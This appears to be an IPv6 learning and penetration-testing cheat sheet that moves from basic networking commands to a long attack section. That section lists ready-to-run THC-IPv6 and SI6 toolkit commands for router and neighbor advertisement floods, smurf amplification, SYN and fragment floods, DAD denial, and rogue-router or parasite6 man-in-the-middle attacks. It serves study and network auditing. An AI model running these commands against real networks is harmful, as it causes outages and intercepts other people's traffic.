Playing with IPv6 for fun and profit
Inspired by @FernandoGont, @fegoffinet and @bortzmeyer
I have also passed the IPv6 Hurrican Electric Certifications with the sage level, it was very fun and educational, I recommend it : https://ipv6.he.net/certification/

• RFCs
  
• IPv4/IPv6 Comparison
  
• IPv6 Specifications
  
• IPv6 Certifications
  
• Cheat sheets
  
• Tools
  
• IPv6 basic network commands
  
• IPv6 network discovery
  
• DNS - AS
  
• Internet access test
  
• Search for IPv6 addresses & domains
  
• Investigation on IPv6 addresses & domains
  
• Scapy
  
• IPv6 hosting
  
• Misc
  
• Vulnerabilities and attacks
  
• Statistics
  
• Sources
  

• Each computer get a public IP
• Local automatic addressing
• Global Autoconfiguration and/or DHCPv6
• No more need of "NAT"
• No more "Header Checksum" IHL fields
• Fragmentation function removed from routers
• DHCPv6-PD, IPAM solutions
• "Flow Label" is new : Used by a source to label sequences of packets for which it requests special handling by the IPv6 routers

Cheat sheet estoile
Cheat sheet roesen

GNU/Linux

$ ping6 ipv6.google.com

Windows:

C:\Users\test>ping ipv6.google.com

GNU/Linux

$ traceroute6 ipv6.google.com

... | grep -E --color "(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))"

$ cat file.txt | addr6 -i -s

@antoniosatlasis did some nice scapy scripts during this workshop (starting on page 184) :
https://www.ernw.de/download/Advanced Attack Techniques against IPv6 Networks-final.pdf
To be continued

Monitoring new related IPv6 vulnerabilites : https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=ipv6

Most of the following vulnerabilities and attacks come from @FernandoGont

• Router Advertisement
• Router lifetime 0
• Neighbor Advertisement
• Neighbor Solicitation
• TooBig error messages
• TCP SYN
• Smurf attack
• Fragments management
• DAD (Duplicate Address Detection)
• Buffer / Connections
• Other denial of services

• Firewall audit & Filter bypass tests
• IPv6 implementation test

• Router Advertisement MITM
• Neighbor Solitication Interceptor

• Predictable fragment ID identification values
• Atomic fragments
• Fragment reassembly policy
• Fragment firewall and implementation tests

• Advertise a malicious Current Hop Limit
• Advertise a malicious MTU
• Disable an Existing Router
• BlackHole

Flood the local network with router advertisements. Many OS do not have an upper limit to the number of network a machine can belong to. All their resources can be consumed trying to join thousands of fake IPv6 networks.
$ sudo ./flood_router26 eth0

Router Advertisement with Router Lifetime set to 0. It announce to 'ff02:1' that a router is going down to delete it from the routing tables. '*' as router-address will sniff the network for RAs and immediately send a kill packet.
$ sudo ./kill_router6 eth0 ROUTERADDR

Flood the local network with neighbor advertisements. The performance on IPv6 host neighbor tables will degrade and cause a DoS.
$ sudo ./flood_advertise6 eth0 TARGETIPv6ADDR
$ sudo ./na6 -i eth0 --target TARGETIPv6ADDR --dst-address ff02::1 --override -E 1:2:3:4:5:6 --loop --verbose

Flood the network with neighbor solicitations. If no target is supplied, query address will be 'ff02::1'.
$ sudo ./flood_solicitate6 eth0 TARGETIPv6ADDR

Flood the target /64 network with ICMPv6 TooBig error messages.
Perform NDP Exhaustion attacks with ICMPv6 TooBig and EchoRequest (Fortinet & Cisco sensitive from Fernando Gont test)
$ sudo ./ndpexhaust26 -c -r -p eth0 TARGETIPv6ADDR

Flood the target with TCP-SYN packets. Destination port can be randomized if you supply "x" as port.
$ sudo ./thcsyn6 eth0 TARGETIPv6ADDR DSTPORT # 'thcsyn6 -h' have interesting options
$ sudo ./tcp6 -i eth0 --src-address SRCIPv6ADDR --dst-address TARGETIPv6ADDR --dst-port DSTPORT --tcp-flags S --flood-sources 100 --loop --sleep 1 --verbose

Flood the target with network traffic amplification. Send ICMPv6 echo requests to 'FF02::1' with the spoofed source from the attack target.
$ sudo ./smurf6 eth0 TARGETIPv6ADDR

Flood the reassembly table with imcomplete fragment packets. Only working with poor fragment reassembly queue management.
$ sudo ./frag6 -i eth0 --flood-frags 10000 --loop --dst-address TARGETIPv6ADDR --verbose
$ sudo ./frag6 -i eth0 --flood-frags 100 --loop --src-address ::/0 --dst-address TARGETIPv6ADDR --verbose

DAD is the mechanism of IPv6 stateless autoconfiguration to detect whether an IPv6 address exists on the network. Every time a new computer asks about IPv6 existence, the attacker replies and claims that he is that IPv6. The new computer cannot join the network since it does not have IPv6 address. It use ICMPv6 neighbor solicitation which sends to all nodes multicast address.
$ sudo ./na6 -i eth0 --accept-src ::/128 --solicited --override --listen --verbose
$ sudo ./dos-new-ip6 eth0

A buffer/connections flood can be done by TCP-SYN with no controlling process and will make a lots of queue data for such connections.
$ sudo ./tcp6 -i eth0 --dst-address TARGETIPv6ADDR --dst-port 80 --listen --src-address TARGETIPv6ADDR/112 --flood-ports 10 --loop --rate-limit 100pps --data "GET / HTTP/1.0\r\n\r\n" --close-mode LAST-ACK

The tools 'denial6' allow to performs various denial of services attacks.
$ sudo ./denial6 eth0 TARGETIPv6ADDR CASENUMBER
Case number :
1 : large hop-by-hop header with router-alert and filled with unknown options
2 : large destination header filled with unknown options
3 : hop-by-hop header with router alert option plus 180 headers
4 : hop-by-hop header with router alert option plus 178 headers + ping
5 : AH header + ping
6 : first fragments of a ping with a hop-by-hop header with router alert
7 : large hop-by-hop header filled with unknown options (no router alert)

Performs various access control & bypass attempts to check implementations.
$ sudo ./firewall6 -H eth0 TARGETIPv6ADDR DSTPORT # Option '-u' for UDP

Tests various IPv6 specific options for their implementations. It can also be used to test firewalls.
$ sudo ./implementation6 eth0 TARGETIPv6ADDR

Announce yourself as a router and become the default router.
$ sudo ./fake_router26 eth0 # 'fake_router26 -h' have many interesting options

This redirect all local traffic to you by answering falsely to Neighbor Solitication requests.
$ sudo ./na6 -i eth0 --accept-target TARGETIPv6ADDR --listen -E 11::33:44:55:66 --solicited --override --verbose
$ sudo ./parasite6 -l eth0

#### Predictable fragment ID identification values Predictable Identification values result in an information leakage that can be exploited in a number of ways like to perform a Idle-scan, DoS attacks (fragment ID collisions), uncover the rules of a number of firewalls or count the number of systems behind a middle-box for example.
$ sudo ./frag6 -i eth0 --frag-id-policy --dst-address TARGETIPv6ADDR --verbose

Atomic fragments are IPv6 packets which are not fragmented but still contain a (redundant) Fragment Header. IPv6 packets that contain a Fragment Header with the Fragment Offset set to 0 and the M flag set to 0. If atomic fragments overlap both of the other ones, all of them can be discarded.
$ sudo ./frag6 -i eth0 --frag-type atomic --frag-id 100 --dst-address TARGETIPv6ADDR --verbose

Assess fragment reassembly policy.
$ sudo ./frag6 -i eth0 -v --frag-reass-policy --dst-address TARGETIPv6ADDR --verbose

The tools fragmentation6 can performs a fragment firewall and implementation checks.
$ sudo ./fragmentation6 eth0 TARGETIPv6ADDR

Advertise a malicious Current Hop Limit such that packets are discarded by the intervening routers.
$ sudo ./ra6 -i eth0 --src-address ROUTERADDR --dst-address TARGETIPv6ADDR --curhop HOPS --loop 1 --verbose

Advertise a small Current Hop Limit such that packets are discarded by the intervening routers.
$ sudo ./ra6 -i eth0 --src-address ROUTERADDR --dst-address TARGETIPv6ADDR -M MTU --loop 1 --verbose

Impersonate the local router and send a Router Advertisement with a "Router Lifetime" small value. The victim host will remove the router from the 'default routers list'.
$ sudo ./ra6 -i eth0 --src-address ROUTERADDR --dst-address TARGETIPv6ADDR --lifetime 0 --loop 1 --verbose

Search for a black hole can be useful to find out who is dropping specific packets, network reconnaissance or just checking if you EH-enabled attacks would work.

Tools : blackhole6, scan6

Not tested yet. Related RFC : https://tools.ietf.org/html/rfc6666

TO BE CONTINUED

## Sources ℹ️

• https://www.iana.org/numbers
• https://www.iana.org/assignments/icmpv6-parameters/icmpv6-parameters.xhtml
• https://www.iana.org/assignments/ipv6-unicast-address-assignments/ipv6-unicast-address-assignments.xhtml
• https://www.iana.org/assignments/ipv6-multicast-addresses/ipv6-multicast-addresses.xhtml
• https://www.ripe.net/
• Google dork : "Fernando Gont" IPv6 filetype:pdf
• http://blog.si6networks.com/
• http://void.gr/kargig/ipv6/fgont-hip2012-hacking-ipv6-networks-training.pdf
• http://cisco.goffinet.org/protocole-ipv6 # FR
• http://www.bortzmeyer.org/hacking-ipv6.html # FR
• http://www.bortzmeyer.org/7707.html # FR
• http://wiki.yobi.be/wiki/IPv6
• https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904
• http://www.worldipv6launch.org/
• https://groups.google.com/forum/#!forum/ipv6hackers
• https://netpatterns.blogspot.fr/2016/01/the-rising-sophistication-of-network.html
• https://www.cs.columbia.edu/~smb/papers/v6worms.pdf
• http://www.maths.tcd.ie/~dwmalone/p/addr-pam08.pdf
• https://mschuette.name/files/uni/110901-Diplomarbeit-SnortIPv6.pdf